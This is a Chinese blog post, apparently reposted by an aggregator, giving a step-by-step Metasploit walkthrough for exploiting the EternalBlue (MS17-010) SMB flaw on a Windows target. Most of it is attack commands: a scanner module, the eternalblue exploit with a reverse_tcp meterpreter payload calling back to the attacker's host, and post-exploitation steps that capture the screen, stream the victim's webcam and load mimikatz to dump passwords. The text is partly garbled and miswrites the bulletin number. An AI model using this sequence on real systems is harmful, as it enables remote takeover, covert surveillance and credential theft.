永恒之蓝漏洞(EternalBlue)
? ? ? ?今天就跟大家分享下剛剛學(xué)習(xí)到利用MSF框架快速搞定“MS017-010”漏洞。其實(shí)我們這里所說(shuō)的使用MSF 實(shí)現(xiàn) “永恒之藍(lán)”的快速攻擊,就是利用Metasploit中針對(duì)ms17-101漏洞的攻擊載荷進(jìn)行攻擊獲取主機(jī)控制權(quán)限。“永恒之藍(lán)”的原理主要是掃描所有開(kāi)放445文件共享端口的Windows機(jī)器。
445端口簡(jiǎn)介:
? ? ? ?445端口是一個(gè)毀譽(yù)參半的端口,有了它我們可以在局域網(wǎng)中輕松訪問(wèn)各種共享文件夾或共享打印機(jī),但也正是因?yàn)橛辛怂?#xff0c;黑客們才有了可乘之機(jī),他們能通過(guò)該端口偷偷共享你的硬盤(pán),甚至?xí)谇臒o(wú)聲息中將你的硬盤(pán)格式化掉! 2017年10月,由于病毒"壞兔子"來(lái)襲,國(guó)家互聯(lián)網(wǎng)應(yīng)急中心等安全機(jī)構(gòu)建議用戶(hù)及時(shí)關(guān)閉計(jì)算機(jī)以及網(wǎng)絡(luò)設(shè)備上的445和139端口 。
準(zhǔn)備:
實(shí)戰(zhàn)攻擊:
Step1:查看MSF框架版本
在終端輸入msfconsole
Step2: 安裝更新metasploit
終端輸入apt-get? install metasploit-framework
Step3:漏洞模塊路經(jīng)查詢(xún)
在終端輸入:search ms17-010
Step4:加載掃描模塊
use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.0.130? ? ? ?(靶機(jī)的IP)
exploit
?
Step5:加載攻擊模塊并配置參數(shù)
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
show options
set rhost 192.168.0.130?(靶機(jī)的IP)
set lhost 192.168.0.129?(發(fā)起攻擊的主機(jī)IP)
set lport 443? ? ? ?(監(jiān)聽(tīng)的端口)
?
Step6:發(fā)起攻擊,成功會(huì)反彈shell
輸入run或者exploit
?
Meterpreter功能展現(xiàn)
1.捕捉桌面:
meterpreter >screenshot
2.視屏開(kāi)啟
meterpreter > webcam_stream
kali會(huì)自動(dòng)打開(kāi)瀏覽器播放被攻擊電腦的攝像頭,被攻擊者的攝像頭也會(huì)亮起來(lái)
?
3.獲取系統(tǒng)管理密碼
Step1:載入mimikatz
meterpreter > load mimikatz
Step2:使用命令wdigest獲取密碼
Meterpreter功能有很多,這里就不一一的示范了,有興趣的可以自己去測(cè)試下。
總結(jié)
以上是生活随笔為你收集整理的永恒之蓝漏洞(EternalBlue)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 图像对齐深度学习算法调研
- 下一篇: 简单的卷积神经网络编程,卷积神经网络算法